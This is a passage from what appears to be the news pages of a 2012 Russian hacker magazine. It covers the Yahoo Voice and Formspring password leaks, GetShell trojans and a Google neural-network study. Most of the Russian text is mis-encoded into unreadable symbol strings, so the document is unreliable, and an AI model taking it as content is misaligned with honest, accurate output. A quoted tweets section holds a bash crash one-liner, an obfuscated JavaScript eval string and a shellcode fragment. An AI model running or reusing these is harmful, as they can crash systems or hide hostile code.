*3%6" 5&.1 -.%,341*()(& 3*"& -."%!4; 32,%:3!&5 !"(-(%6&)5 & -.&#&51(& 2<134&% * "=2<1'>&? 3%33&)?. @3%6" * 5%A,2#1.",#"5 0&#1(% *3%5&.#"6" 342,%#<%3!"6" !2=!1 4%?#"("6&: -.&#)(& 2<134&% ="(%% 350 342,%#4"* &B 75 34.1# 5&.1. C"33&' * 0&#1(% -.%,341*()(1 4"53!1) !"51#,1 Bonjour Development — 342,%#4; DE+EC1, FGDH & 13-&.1#4 H88H CIJ. J" -"=%,1 * !"#!2.3% *-%.*;% "341-(139 B1 !"51#,": E!.1&#;. K"51#,1 Quadsquad -"!1B1(1 #1 !"#!2.3% 3&34%52 ,() -"5">& #%5;5 (',)5 Enable Talk. +-%$&1(9#;% -%.<14!&, "3#1>%##;% 5#"A%34*"5 3%#3"."* & ,14<&!"* ,*&A%#&), -%.%,1'4 ,1##;% " A%341? #1 5"=&(9#"% 234.":34*". L1##;% 1#1(&B&.2'43), .13--"B#1'43), & 6%#%.&.2%43) 6"("3"*"% 3""=>%#&% — 41!&5 "=.1B"5 3&34%51 4.1#3(&.2%4 )B;! A%34"* * "=;<#2' .%<9, & #%5;% (',& 5"624 "=.%34& «7(%!4."##;: 6"("3». K"51#,;--"=%,&4%(& -"(2<&(& -.&B; * .1B5%.% 25, 10 & 5 4;3)< ,"((1."* +MI B1 -%.*"%, *4"."% & 4.%49% 5%341 3""4*%434*%##". C"33&:3!1) !"51#,1 Bonjour Development -.%,341*&(1 3*": -."%!4 M. D. Voice. + -"5">9' Windows Phone 7 342,%#4; .1B.1="41(& 5%4", .1##%: ,&16#"34&!& B1="(%*1#&: 6".41#& #1 "3#"*% 1#1(&B1 &B5%#%#&) 6"("-31. 8."%!4 =;( -.&B#1# (2</&5 * C"33&&, -"(2<&( *;3"!&% "$%#!& 5%A,2#1.",#"6" A'.& * I*34.1(&&, #" * ?",% "4="."<#"6" 42.1 * 32-%.0&#1( #% -."/%(.

!"#$%& '()*+),) -#./01!"!#$ !%&'"(## # )$*+#), '*%-.*"/#0#)1 + #20$

'%3$45 + )%).67"(## %4$*8"0" !%&"(4" 5!*"#(,

.).")/+./ 2&31+ IMAGINE CUP 2012

/

%-"#)4#;5 "=.1B"5 * +%49 -"-1(& e-mail-1,.%31 -"(9B"*14%(%: -"-2().#%:/%6" "=(1<#"6" ?.1#&(&>1 Dropbox. N&4%(& O%.51#&&, J&,%.-

(1#,"* & @%(&!"=.&41#&& "341*()'4 #1 0".25% Dropbox 3""=>%#&) " 4"5, <4" -"(2<1'4 3-15 #1 1,.%31, 3"B,1##;% 3-%$&1(9#" ,() &3-"(9B"*1#&) Dropbox. L() -.")3#%#&) 3&421$&& !"5-1#&) -.&6(13&(1 #%B1*&3&5;? 7!3-%.4"*.P1!%.3!1) 6.2--1 D33Ds Company *;("A&(1 #1 3*"%5 31:4% 4%!34"*;: 01:( 3 2!1B1#&%5 1,.%3"* 7(%!4."##": -"<4; & -1."(%: 453 492 -"(9B"*14%(%: Yahoo. H#0".51-$&) )*#" 3"=.1#1 3 -"5">9' SQL-&#Q%!$&& — 4%!34"*;: 01:( 3",%.A&4 ="(%% 2700 #1B*1#&: 41=(&<#;? 34."! & 34"(=$"*, 1 41!A% #1B*1#&) 298 -%.%5%##;? MySQL. R!3--%.4; 3<&41'4, <4" *B("51# 3%.*&3 Yahoo Voice, -"3!"(9!2 * 01:(% %349 34."!1 «dbb1.ac.bf1.yahoo.com», 1 74"4 -",,"-5%# -.&#1,(%A&4 &5%##" %52.

H3-"(#&4%(9#;: ,&.%!4". 3%.*&31 *"-."3"* & "4*%4"* Formspring -",4*%.,&(, <4" =1B1 &B 420 4;3)< ?%/%:, "-2=(&!"*1##1) #1 ",#"5 &B ?1!%.3!&? 0".25"*, ,%:34*&-4%(9#" -.&#1,(%A&4 -"(9B"*14%()5 Formspring. C13-3(%,"*1#&% *;)*&(", <4" #%&B*%34#;: B("25;/(%##&! -."#&! #1 ",&# &B 3%.*%."* .1B.1="4!& & 3!"-&."*1( =1B2 ?%/%:. E)B*&5"349 * 3&34%5% 2A% B1!.;41. 81."(& *3%? -"(9B"*14%(%: Formspring (1 &? ="(%% 22 5&((&"#"*!) -.&-#2,&4%(9#" ,%1!4&*&."*1#;, ,() *?",1 #1 31:4 4.%=2%43) 35%#&49 -1."(9.

. Top-10 ,()!#-4 Yahoo, !0.!262(107 .( /"-89-:

123456 1666 (0,38%)password 780 (0,18%)welcome 436 (0,1%)ninja 333 (0,08%)abc123 250 (0,06%)123456789 222 (0,05%)12345678 208 (0,05%)sunshine 205 (0,05%)princess 202 (0,05%)qwerty 172 (0,04%)

F-SECURE '--45*0" - .-/-2 /%$)-.-'$, #-(-%67 .$ -8%".*9*/"$('1 :"%";$.*-$2 (-0<#- WINDOWS-2"3*., .- '=-'-4$. %"'=-:."/"(< %":0*9.6$ -': Windows, Mac OS % Linux % %0,!#7:!2("7 0!!"2-"-0"2/;<%4 =90,#!4" &#1 9($&!4 9!.9)-".!4 >?. @(#2()7 ,!#/8%-#( %'-.( Trojan-Downloader:Java/GetShell.A, Backdoor:OSX/GetShell.A, Backdoor:Linux/GetShell.A % Backdoor:W32/GetShell.A.

$5$ )/-$ >9"'(.*#-/ !"#-8%>==6 LULZSEC (20-#-".%4 A(4-. +#%)% % 19-#-".%4 B$-49 B-2%0) ,)%:.(#% 02!; 2%./ 2 C!&- !8-)-&.!*! :(0--&(.%1 0/&( 2 D-#%9!E)%"(.%%.

462 *: 500 (4-0$$ 90%) '"26! 46'(%6! #-2=<,-($%-/ =0".$(6 %"4-(",( =-) >=%"/0$.*$2 *NIX-'*'($2, 0!!E<(-" )-4"%.* TOP500 0('6C '!<.6C 0/,-)9!',7;"-)!2.

!"#$%&'())$* +(#+',%$ -". +(,/"#)'%(0 — 12( 3$/$)2'* +(456")'* 0$7)(3( #4* 8$, 75/)$4$ ' 1%()(9'* #( 40 % (2 /(.)'6)(: &"); 0 %'(,%".

8-800-200-3-999+7 (495) 663-82-77 (-",+4$2)()

shop.glc.ru 6 )(9"/(0 — 1110 !"#.12 )(9"/(0 — 1999 !"#.

6 )(9"/(0 — 1110 !"#.12 )(9"/(0 — 1999 !"#.

6 )(9"/(0 — 950 !"#.12 )(9"/(0 — 1699 !"#.

6 )(9"/(0 — 690 !"#.12 )(9"/(0 — 1249 !"#.

6 )(9"/(0 — 775 !"#.12 )(9"/(0 — 1399 !"#.

3 )(9"/$ — 630 !"#.6 )(9"/(0 — 1140 !"#.

6 )(9"/(0 — 895 !"#.12 )(9"/(0 — 1699 !"#.

6 )(9"/(0 — 810 !"#.12 )(9"/(0 — 1499 !"#.

6 )(9"/(0 — 1194 !"#.12 )(9"/(0 — 2149 !"#.

6 )(9"/(0 — 894 !"#.12 )(9"/(0 — 1699 !"#.

6 )(9"/(0 — 1110 !"#.12 )(9"/(0 — 1999 !"#.

6 )(9"/(0 — 564 !"#.13 )(9"/(0 — 1105 !"#.

6 )(9"/(0 — 599 !"#.12 )(9"/(0 — 1188 !"#.

6 )(9"/(0 — 1110 !"#.12 )(9"/(0 — 1999 !"#.

6 )(9"/(0 — 810 !"#.12 )(9"/(0 — 1499 !"#.

$%&$'(')*!

010

MEGANEWS !"#$"%&' ()*%+("' GMAIL !",-./)$(0 425 '+,,+"1"% #),"%)2 !" %()'/ '+*/, !""#$%&' Google.

!"#$%"&'&()& X Lab , «*&+#&,($- '$.!#$,!#)-» +!/0$()) Google , *!1/&*,(! * 23&(4/) )% 5,6(-7!#"*+!8! 2()1&#*),&,$ !02.')+!1$'$ !,3&,,

1 +!,!#!/ *!!.9$&,*-, 3,! 23&(4/ +!/0$()) 2"$'!*: *!%"$,: +#20(&;<2= *$/!!.23$=92=*- +!/0:=,&#(2= (&;#!((2= *&,:. >$0!/()/, 3,! X Lab ?!#!<! )%1&*,($ 1*&/2 /)#2 )/&((! .'$8!"$#- #$%')3(4/ )((!1$@)!(-(4/ 0#!&+,$/, 1#!"& .&*0)'!,(4? $1,!/!.)'&;, 20#$1-'-&/4? +!/0:=,&#!/, )') !3+!1 "!0!'(&((!; #&$':(!-*,). A&0&#: 1!, ($*,$' 3&#&" (&;#!((!; *&,).

B3&(4& #$**+$%$'), 3,! ($ 0#!,-C&()) (&*+!':+)? '&, #$.!,$') ($" *)/2'-@)&; 3&'!1&3&*+!8! /!%8$, 1 ?!"& 3&8! ) .4'$ *!%"$($ !"($ )% +#20(&;<)? 1 )*,!#)) (&;#!((4? *&,&; "'- /$<)((!8! !.23&()-. 5&,: .4'$ 0!*,#!&($ ($ 16 ,4*-3$? 0#!@&**!#!1. D #&%2':,$,& )**'&"!1$,&') */!"&')#!1$') *)*,&/2 * 0#)/&#(! /)'-')$#"!/ 1%$)/!*1-%&; /&C"2 !,"&':(4/) 0#!@&**$/) ((&;#!($/)). E'- *#$1(&()-: "! 6,!8! 1 6+*0&#)/&(,$? 0! /$<)((!/2 !.23&()= 0#)/&(-')*: *&,) #$%1& 3,! * 1–10 /)'')!($/) *1-%&;.

5$/4; )(,&#&*(4; (=$(* *!*,!), 1 ,!/, 3,!, !.&*0&-3)1 (&;#!((!; *&,) "!*,20 1 )(,&#(&,, 23&(4& 0!%1!')') &; !.23$,:*- *$/!*,!-,&':(!. D +$3&*,1& /$,&#)$'$ "'- #$.!,4 *&,: )*0!':%!1$'$ 1)"&!#!')+) * YouTube. F; "&/!(*,#)#!1$')*: *'23$;(4& )%!.#$C&()-. G%23)1 !+!'! 10 /)'')!(!1 #$("!/(4? @)7#!14? +$#,)(!+, 1%--,4? )% 1)"&!#!')+!1, (&;#!(($- *&,: *$/!*,!-,&':(! ($23)'$*:... #$*0!%($1$,: )%!.#$C&()- +!<&+ :). B3&(4& 21&#-=,, 3,! 677&+,, 0!'23&((4; !, "$((!8! )**'&"!1$-()-, *)':(! 2")1)' "$C& )? *$/)?, 1&": *&,: *$/!*,!--,&':(! */!"&')#!1$'$ )%!.#$C&()& +!<+), ) #&%2':,$, 14<&' +2"$ .!'&& ,!3(4/, &*') *#$1()1$,: &8! * "#28)/) !.H&+,$/) 1 $($'!8)3(4? 6+*0&#)/&(,$?. I#!1&"&((!& )**'&"!1$()& 1!!.9& 0#&"*,$1'-&, *!.!; (!1!& *'!1! 1 +!/0:=,&#(!; ($2+&, +!,!#!& *,$'! 1!%/!C(! ,!':+! .'$8!"$#- 0$"&()= *,!)/!*,) +!/0:=,&#(4? 143)*-'&(); ) "!*,20(!*,) !8#!/(4? +'$*,&#!1 +!/0:=,&#!1 1 8)8$(,*+)? "$,$-@&(,#$?.

>!1)%($ 6,!8! 6+*0&#)/&(,$ %$+'=3$&,*- 1 ,!/, 3,! #$(:<& 0#) *!%"$()) 0!?!C)? (&;#!((4? *&,&; '=") ($.'="$') %$ !.23&()&/ +!/0:=,&#(!8! )(,&''&+,$ ) 20#$1'-') )/, $ 1 6,!, #$% /$<)(4 0!'23)') 0!'(2= *1!.!"2. E&'! 1 ,!/, 3,! *29&*,12=9)& 1 ($<& 1#&/-

$'8!#),/4 /$<)((!8! !.23&()- 0!3,) 1*& !*(!1$(4 ($ $($')%& !8#!/(!8! +!')3&*,1$ 6+*0&#)/&(,$':(4? "$((4?. >$0#)/&#, 3,!.4 ($,#&()#!1$,: *)*,&/2 ($ 1)-%2$':(!& #$*0!%($()& (!2,.2+!1, (&!.?!")/! 0#&"1$-#),&':(! 0!+$%$,: &; /(!C&*,1! 7!,!8#$7);, !.!%($-3&((4? +$+ «(!2,.2+)». J$+ 0#$1)'!, ,$+)& *)*,&/4 )*0!':%2=,*- "'- #$*0!%($1$()- 2*,(!; #&3), $($')%$ )%!.#$C&();, 0#!1&#+) *!!.9&(); ($ *0$/. «K4 ()+!8-"$ (& 8!1!#)') *&,) 1 0#!@&**& ,#&()#!1!+: „6,! +!<+$“. A$+)/ !.#$%!/, /$<)($ 7$+,)3&*+) *$/$ )%!.#&'$ "'- *&.- +!(@&0@)= +!<+)», — 0!-*(-&, EC&77 E)(, 23&(4; )% )**'&"!1$,&':*+!; '$.!#$,!#)) Google. >&;#!(($- *&,: Google *$/!*,!-,&':(! *7!#/)#!1$'$ #$%/4,!& )%!.#$C&()& +!<+), )*0!':%!1$1 ($.!#4 )%!.#$C&(); #$%(4? +!,!1 )% 0$/-,). B3&(4& 8!1!#-,, 3,! ($ 0#)/&#& 6,!; *&,) )/ 10&#14& 2"$'!*: 0!1,!#),: 0#!@&** !.23&-()-, +!,!#4; 0#!)*?!"), 1 3&'!1&3&*+!/ /!%8&.

GOOGLE !"#$%&' "()!*(+!$, +-.',! +$-*/&'0' 0'*'1&'0' )'20-

!

(&)*"++%, !&'- «.*"!/"-'*&0%» #"0&& 10 /1001"+"2 3%*'1+"3 1 *%!."4+%0% 1/&+-+" 14"#*%5&+1& 3"631 016- ."'"/7, 8'" 3%*'1+31 ! 9'1/1 512"'+:/1 2!'*&8%;'!, 2 <&'1 8%$& 2!&=".

!"#$%!!%# &"'( GOOGLE !$)*+'&+ ,%'(,(

342)* 09 /164/ 2012

«'.!3$&($ &- !",+'4",1$ .$2 5*-1(-,!+&'0' 11'6- &$788$5,(1&'. 6$,9) &!:&' +-21(1-,/ )','+(5! ( !3(,/"9 #("-,/»

.(** 0$4," '. ("#'*/2'1-&(( #*-&%$,'1 1 '.+-2'1-&((:

!"#$% 09 /164/ 2012 011

#hacker tweets

!"#$% 09 /164/ 2012 011

@kkotowicz!"#$%" &'" ("#)&*# e-mail + ,#-."/-01"+'23* "' "(41+"0+-1"." 541/"0-. 6-7/89 /"#741

("(0","5-'$ responsible disclosure!

@toxo4ka«: CISO, 2 14 ;"&) (0*1*3-'$ 04<41*2. : ;"&) 5+4 =-(04'*'$».

@d_olexVMware >%c(#"9' /#2 (",4.- *= ."+'45"9 ?@ by @PiotrBania bit.ly/OPgin5

#&''()*+,-.:A%+(#"9', 3"74', * +'-089, 1" '-%*;

5"' >%+(#"9'"5 (0-%'*&4+%* 14', * ("'"3) "1 "&41$ ("#4=41 /#2 *=)&41*2.

!"#$%#& '()*+,

@Agarri_FR?'#*&189 bash crasher: «test -e /dev/fd/111111111111111111111111111111111» goo.gl/Q4xiE

CVE-2012-3410

@VUPENB#".: (0"/5*1)'-2 >%+(#)-'-C*2 IE9 MSXML Uninitialized Memory MS12-043 + ",;"/"3 ASLR/DEP…

*+("#$=)2 !?DE6? RGB! bit.ly/buFG1s

@esizkur:@ID_AA_CarmackF/*5*#+2, ",1-0)7*5, &'" C++ ("-'*;"3) %"1540'*0)4' false

5 #G,"9 )%-=-'4#$ %-% 0. B4=504/1" (" +0-5-141*G + return NULL, 1" ("=5"#24' 58=85-'$ (#";*4 H)1%C**.

@skeptic_fxx=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1; 1,1,1,o='0',1,1,1; x(x(s+b+141+b+154+b+145+b+162+b

+164+b+o+50+b+o+61+b+o+51+s));

#&''()*+,-.:F.-/-9, ("&43) '-%?

@ea_foundationA'" '"&1", &'" 5+2 x86 ("#1- +4%+*=3-. 6-7/89 <4##-%"/40 =1-4': mov al, __NR_execve

equals 0xb00b. RE: 0xB16B00B5

#&''()*+,-.:I4/-51*9 <)3 1- '43) '".", &'"

5 %"/4 2/0- D*1)%+- ,8#- 1-9/41- +'0"%-: 0xB16B00B5 (big boobs). J-=0-,"'&*%* *=5*-1*#*+$ =- >'". 6+'-'*, 5 %"/4 Microsoft ,8#" (";"744: 0x0B00B135 (boobies). K"' >'" 2 1-=85-G 1-+'"2L*3 +'-'*&4+%*3 -1-#*="3 %"/-!

@SteveStrezaalias please=sudo

@agustingianniM1'40-%'*5189 %"3(*#2'"0 /#2 C++. F.-01" * ("#4=1": gcc.godbolt.org.

#&''()*+,-.:J4-#$1" ("#4=1-2 ++8#%-. ?+",411"

4+#* '8 (*<4<$ <4##-%"/ 8)

@DEVOPS_BORATM+'"&1*%* *= CERN +"",L*#*, &'" 3"1)341'-#$1-2 =-/-&- /#2 1*; — >'" ("*+% +#4/"5 Linux 1-

0-,"&43 +'"#4.

#&''()*+,-.:N)'%- <)'%"9, 1" ) CERN +5"9 /*+-

'0*, Linux (Scientific Linux), %"'"089 * ("3". 5 ",1-0)741** ,"="1- O*..+-!

@aaminsalehiFrom Russia With Love!!! RT @PiotrBania: bit.ly/MZOMoh

#&''()*+,-.:N)'%- 5 !5*''404 " '"3, &'" 5 @P,

'04,)4'+2 0-=0-,"'&*% 3-#5-0*, "+'-#-+$ <)'%"9, '43 14 34144, (" +#"5-3 -5'"0-, 43) (0*<#" 14+%"#$%" 04=G34: /5- *= J"++**, "/1" *= K"+'"&1"9 Q50"(8, "/1" *= R0-1C**, - "/1" /-74 *= 641**!

@thezdiS1"1+*0)43: Mobile Pwn2Own 2012: bit.ly/OEO9BK #pwn2own

#&''()*+,-.:ZDI 0-+<*0*#- +5"4 340"(0*2'*4

Pwn2Own. !-%*3 ",0-="3, 5 +41'2,04 5 S3+'40/-34 1- EUSecWest (0"9/4' %"1-%)0+ (" 5=#"3) 3",*#$18; )+'0"9+'5 &404= +#4/)GL*4 54%'"08: Mobile Web Browsers, Near Field Communication (NFC), Short Message Service (SMS), Cellular Baseband.

!"#$% 09 /164/ 2012012

MEGANEWS

!"#$%&'' Ericsson ()&" *%+",%-, &%.,"(/'0 $"-!1"&&'!' !'+0*$%&!% ' 2&,34'%.,5 .)"06" 701%. 8..107")%,01' Ericsson $*"70#"&.,*'*")%1'

)5."!".!"*".,&3- $0*07%93 7%&&5: $*(#" 90*04 901"-)090.!"0 ,01"! ;0:&"1"6'( $"139'1% 6")"*(/00 &%4)%&'0 Connected Me. <%! &0 ,*37&" 7"6%7%,=.(, *%4*%+",!% $*'4)%&% ."07'&(,= 901")0!% . 1-+"> ,0:&'!"> (701%0,-.( 2," $*' $"#"/' .#%*,?"&%). Connected Me $"4)"1(0, $0*07%)%,= '&?"*#%@'- &% .!"*".,(: ) 6–10 A+',/., &" ' 20–40 A+',/. — *0%1=&%( 4%7%9%. B%4*%+",!% '#00, 9*04)59%>&" &'4!"0 210!,*"$",*0+10&'0, &0+"1=C3- .,"'#".,=, &0 ,*0+30, .$0@'%1=&5: $0*0:"7&'!"), 9," 7%0, )"4#"D&".,= #%..")"6" )&07*0&'(. E1( '.$"1=4"-)%&'( Connected Me &3D&5 ,"1=!" .#%*,?"& ' $*'0#&'!, ".&%/0&&50 .$0@'%1=&"> @'?*")"> .:0#">, !","*%( $"4)"1', $0*07%)%,= 7%&&50 $*' $"#"/' 210!,*"#%6&',-&5: $"10>, 9," "+*%43-,.( #0D73 4%40#10&&5# 901"-)090.!'# ,01"# — $0*07%,9'!"# (Tx) ' $*'0#&'!"# (Rx) 210!,*"7%. F:0#% $"7!1-90&% ! $1%.,'&0, $0*0.51%-/0> .'6&%15 ) ,01". G&%1"6'9&%( .:0#% *%+",%0, ) $*'0#&'-!0, "$*0701(( .'6&%1, $*"C07C'> 90*04 901")090.!'> "*6%&'4#. F $"#"/=- Connected Me #"D&" +370,, &%$*'-#0*, *%.$1%,',=.( ) #%6%4'&0 $*".," ",,'.!"# *3!', +04 '.$"1=4")%&'( +%&!").!"> !%*,5, '1' "+#0&(,=.( )'4',-!%#' $*' *3!"$"D%,''. <%!'0 3D ,3, #0,!' NFC.

'!%!': "?'@'%1=&5: 4%()10&'> «H%+"*%,"*'( <%.$0*.!"6"» $"!% &0 701%1%, &" $%*% )%!%&.'>, &07%)&" $"()')C':.( &% HeadHunter, #"D0,

.)'70,01=.,)")%,= " ,"#, 9," ) !"#$%&'' '70, *%+",% &%7 ."+.,)0&&"> «+04"$%.&"> "$0*%@'"&&"> .'.,0#">». I "+J()10&'(: " &%>#0 H< $*071%6%0, *%+",3 %&%1','!3 ,*0+")%&'> ) &")"# $*"0!,0 ' .,%*C0#3 *%4*%+",9'!3 .'.,0# "+0.$090&'( +04"$%.&".,' GFK ;L / SCADA. M+0 )%!%&.'' &%9'&%-,.( ." .1") " ,"#, 9," ) «H%+"*%,"*'' <%.$0*.!"6"» ) ,090&'0 )0.=#% 71',01=&"6" )*0#0&' '70, *%4*%+",!% &")"> +04"$%.&"> MF. 84 ,0!.,% "+J()10&'> #"D&" $"&(,=, 9," 61%)&"> .?0*"> $*'#0&0&'( «&")"> +04"$%.&"> MF», .!"*00 ).06", .,%&3, $*"#5C10&&50 '&?"*#%@'"&&50 .'.,0#5 (GFK ;L — %),"#%,'4'*")%&-&50 .'.,0#5 3$*%)10&'( ,0:&"1"6'90.!'#' $*"@0..%#'). F"'.!%,01= 7"1D0& &0 ,"1=!" ."",)0,.,)")%,= "+59&5# ,*0+")%&'(# ,0:&"1"6'90.!': !"#$%&'>, &" ' "+1%7%,= "$5,"# *%+",5 . 7'.$0,90*.!'# LM (SCADA), $*"#5C10&-&5#' $*","!"1%#' ' !"&,*"110*%#'. M, .,%*C06" *%4*%-+",9'!%, $"#'#" "$5,% $*"6*%##'*")%&'( GFK ;L ' SCADA, 3#0&'( *%+",%,= . $0*09&0# $*","!"1") (Profibus, Modbus, OPC, DNP, Industrial Ethernet) ' !"&,*"110*"), ,*0+30,.( 4&%&'0 .'.,0#5 *0%1=&"6" )*0#0&' QNX ' "$5, $*"6*%##'-*")%&'( 71( FKNE.

!"#"$%&% $%''() &"#"* +",- &",-."/% 01" #"%,2'-3+2!"#$%&'(, &) *'!)+),-),)!&'( +".&)/)01( ERICSSON

-/'&2 KASPERSKY LAB *',,"3*"+1/ *"3*$+1&0)425 ,'5+

«,%4-#%+-#56 /%3!"#3/-7-» #%*#%4%+(.%"+ 3.-8 -3

&'"() *+,$&'-), , #"-#./ &.00. )1)23$'&4 )1-),($-*$ &*&'$05 3) WINDOWS 8 3(4 6)(7+),"-'$($2 WINDOWS XP, VISTA *(* 7, — !"#$ $%&'"()$ *+*,$-., 39,99 )+//$'$.

6%*3.0"'7 -),)$ *04 3*&'%*1.'*,. MANDRIVA %$8*(* ,&$0 0*%)0 — %'. %+0+1. +%'+*$. 2 .,+&" 3+/4-5" -*"&+ &+/+*+- 36/+ +,)$#+ 7$ #$7-$#." Mandala Linux.

-,

, XBOX LIVE '$6$%7 %$"(*+),"-" 3,.!.%),-$,"4 ".'$-'*9*#":*4 — * 8+)+0 %+),-"'9)"#.:, -6*6/$"060 %+ SMS ./. e-mail.

%"+%"1)';*#* &,$%!-3$8$,)<) #)067/'$%" RASPBERRY PI 6%$3&'",*(* &)1&',$--./ )6$%":*-)--./ &*&'$0. RASPBIAN — ).*,'.3;,.- Linux, *+7)$#-#6( #$ +*#+-" Debian.

MICROSOFT 0)=$' <)%-3*'7&4 — -" 50% #)067/-'$%), , 0*%$ .&'"-),($--" WINDOWS 7, %+)*<.,$/ StatCounter. =;3"9 - 50% 8+0%$#.. ;)$/+*4 %'"+)+-/",4 - .>#" 2012 &+)$.

,*3$)!)&'*-< YOUTUBE )1+",$(&4 *-&'%.0$--')0 3(4 ",')0"'*;$&#)-<) %"+05'*4 (*: (/3$2 -" ,*3$)+"6*&4!. ?"%"'4 *8'6,4 /.!$ 0+9#+ 3;8-$/4-#+ - )-$ 8/.8$.

2 /$3+'$,+'.. Ericsson ,"@#+/+-&.: Connected Me %'+5/$ 0#+9"*,-+ ,"*,+-, 8+,+'6" %+8$7$/., <,+ -*" +3+';)+-$#." 3"7+%$*#+. A.%6 Connected Me %+*,;%:, #$ '6#+8 - ,"<"#." 12–18 0"*:!"-, Ericsson %'")%+/$&$",, <,+ +#. 0+&;, %+:-.,4-*: #$ *0$',B+#$@, %"'*+#$/4#6@ 8+0%4>,"'$@, ,"/"-.7+'$@ . %'.#,"'$@.

!"#$% 09 /164/ 2012 013

&#'%' ()%'*"+ ,-"./'%0" STEAM &."1$. 2'&.3,1" ( 2-+ LINUX. !"#$%&'( Valve )*+ ,%-".%+. &%/ 01'+&.20'# #"/)1+#.

!"#$%&%', ($)!*&+$,' -./. )$0!#12 !, 0$(#&/+34 %$2,!5, %105&-%!5 & ,$- 6$#11 5%1-,$-& ,781#!. 9%)!#'(!5$,' 51(61 !6&+$-!531 & )0!%,31 )$0!#& — ,!81 +1 !%!:1++! 4!0!;!, 0$5+! -$- & 40$+&,' &4

5 -$-!*-+&:.6' *1+168101 (5%1 <,! !=.,&*! %+&8$1, :1(!)$%+!%,'). >%,$1,-%7 #&:! ($51%,& ?1-01,+.@ A.*$8-., #&:! &%-$,' -$-&1-,! $#',10+$,&53.

B1 %!5%1* !:3/+!1 01;1+&1 )0!:#1*3 )016#$"$1, -!*)$+&7 Ford, 0$(-0$:!,$5;$7 ,14+!#!"&@ Ford KeyFree Login. C!-$ 01;1+&1 01$#&(!5$+! 5 5&61 )0&#!81+&7 6#7 iPhone, & 6#7 .)0$5#1+&7 )$0!#7*& & $.,1+,&D&-$-E&12 &%)!#'(.1,%7 )0!,!-!# Bluetooth. ?.,' )0!%,$: -$- ,!#'-! %*$0,D!+ !-$(35$1,%7 5 0$6&.%1 612%,5&7 :1%)0!5!6+!"! *!6.#7 -!*)'@,10$, %&%,1*$ $5,!*$,&/1%-& )0!&(5!6&, $.,1+,&D&-$E&@ +$ 5%14 %105&%$4, -!,!031 .%,$-+!5#1+3 5 +$%,0!2-$4. F0!*1 )0&#!81+&7 6#7 iPhone, +.8+! ,$-81 .%,$+!-5&,' 0$%;&01+&1 6#7 Google Chrome. ? 1"! )!*!='@ %&%,1*$ !%.=1%,5#71, :3%,032 54!6 +$ !)0161#1++31 %$2,3, & )!#'(!5$,1#@ +1 ,01:.1,%7 +&/1"! 55!6&,' 50./+.@. ?*$0,D!+ 53%,.)$1, 5 0!#& .+&-$#'+!"! :1%)0!5!6+!-"! $.,1+,&D&-$,!0$. F!"6$ .%,0!2%,5! )!-&6$1, (!+. 612%,5&7 Bluetooth, %&%,1*$ $5,!*$,&/1%-& 61#$1, logout &( 5%14 51:-%#.8:, "61 :3#$ )0!&(-5161+$ $5,!0&($E&7. C0!,!,&)!* Ford KeyFree Login 53%,.)&#$ :1%-!+,$-,-+$7 %&%,1*$ .)0$5#1+&7 %&"+$#&($E&12 $5,!*!:&#7, ,$-81 53)!#+1++$7 5 5&61 *!:&#'+!"! )0&#!81+&7. G%)14 !, 5+1601+&7 ,14+!#!"&& KeyFree 6#7 $5,!*!:&#12 )!6,!#-+.# &+81+10!5 Ford 01$#&(!5$,' +1/,! )!6!:+!1 6#7 )!5%16+15+!2 8&(+&.

!6 <"&6!2 :!0':3 % )16!D&#$*& & ,100!0&%,$*& 5 ?1,& ,5!07,%7 /.6+31 51=&. B16$5+! 6&01--,!0 )! :1(!)$%+!%,& Facebook H8! ?$##&5$+

%)!-!2+! )!516$# 5 &+,105'@ $"1+,%,5. «I12,10», /,! %!E&$#'+$7 %1,' &%)!#'(.1, 5 J,$,$4 $5,!*$,&/1-%-&1 $#"!0&,*3 %-$+&0!5$+&7 /$,!5 & 60."!2 #&/+!2 &+D!0*$E&& )!#'(!5$,1#12. F!+1/+! 81, % E1#'@ )!&%-$ & 0$++1"! 5375#1+&7 )01%,.)#1+&2. 9 516' 6$81 +1#'(7 %-$($,', /,! )101)&%-. )!#'(!5$,1#12 /&,$@, &%-#@/&-,1#'+! 0!:!,3. H1#! 5 ,!*, /,! $#"!0&,* ,!#'-! %-$+&-0.1, )101)&%-. & ).:#&-$E&& )!#'(!5$,1#12 Facebook, +! 1%#& !+ !:+$0.8&5$1, )!6!(0&,1#'+.@ $-,&5+!%,', ,! )!*1/$1, )0!D&#' & %!!:=$1, ! +1* %)1E&$#'+!*. %!,0.6+&-. Facebook. 9*1++! %!,0.6+&- !E1+&5$1, %,1)1+' !)$%+!%,& & 5 %#./$1 +1!:4!6&*!%,& %!!:=$1, ! )!,1+E&$#'+!* )01%,.)+&-1 5 )!#&E&@. K,! 6!5!#'-+! +1!8&6$++$7 +!5!%,' — 0$+';1 %/&,$#!%', /,! %$* Facebook +1 ($+&*$1,%7 *!+&,!0&+"!* /$,!5 5 )!#'(. )!#&E&&, $ ,!#'-! *!81, 536$,' 0$%)1/$,-& /$,-%1%%&2 )! )!#&E12%-!*. &#& %.61:+!*. ($)0!%.. >-$(35$1,%7, !+ !%.=1%,5#71, & )0151+,&5+31 *103. H8! ?$##&5$+ )!6/10-&5$1,: «L,!:3 +1 %,$#-&5$,'%7 % %&,.$E&12, 5 -!,!0!2 +$;&* %!,0.6+&-$* )0&4!6&,%7 /&,$,' /.8.@ )101)&%-., *3 &%)!#'(.1* %&%,1*. % !/1+' +&(-&* )0!-E1+,!* „#!8+34 %0$:$,35$+&2“».

9(51%,+!, /,! &%)!#'(.1*$7 6#7 *!+&,!0&+"$ 612%,5&2 @(10!5 %&%,1*$ %D!-.%&0!5$+$ +$ 6&$#!"$4 *186. )!#'(!5$,1#7*& % «:16+3*&» %57(7*&. C!6!(0&-,1#'+3*&, )! *+1+&@ Facebook, 75#7@,%7 %#./$&, -!"6$ 65$ )!#'(!5$,1#7 !:=$@,%7, +1 75#77%' 5($&*+3*& 60.-('7*& &#& %,$5 60.('7*& +16$5+!. ?!5%1* %,0$;+!, 1%#& . +&4 )0& <,!* +1, !:=&4 60.(12, $ )0!/&1 60.('7 5($&-*!612%,5.@, % )!#'(!5$,1#7*& & 60." % 60."!* -0$2+1 016-!. M$-81 -0&*&+$#!* %/&,$1,%7, 1%#& 65$ )!#'(!5$-,1#7 &*1@, :!#';.@ 0$(+&E. 5 5!(0$%,1. ?#!5!*, 1%#& ,3 +1 !%!:1++! $-,&5+32 )!#'(!5$,1#' Facebook % %!,+7*& 60.(12 & ,1:1 ($ 30, )!(60$5#71* — ,3 75+! )!,1+E&$#'-+32 )16!D&# & ,100!0&%,.

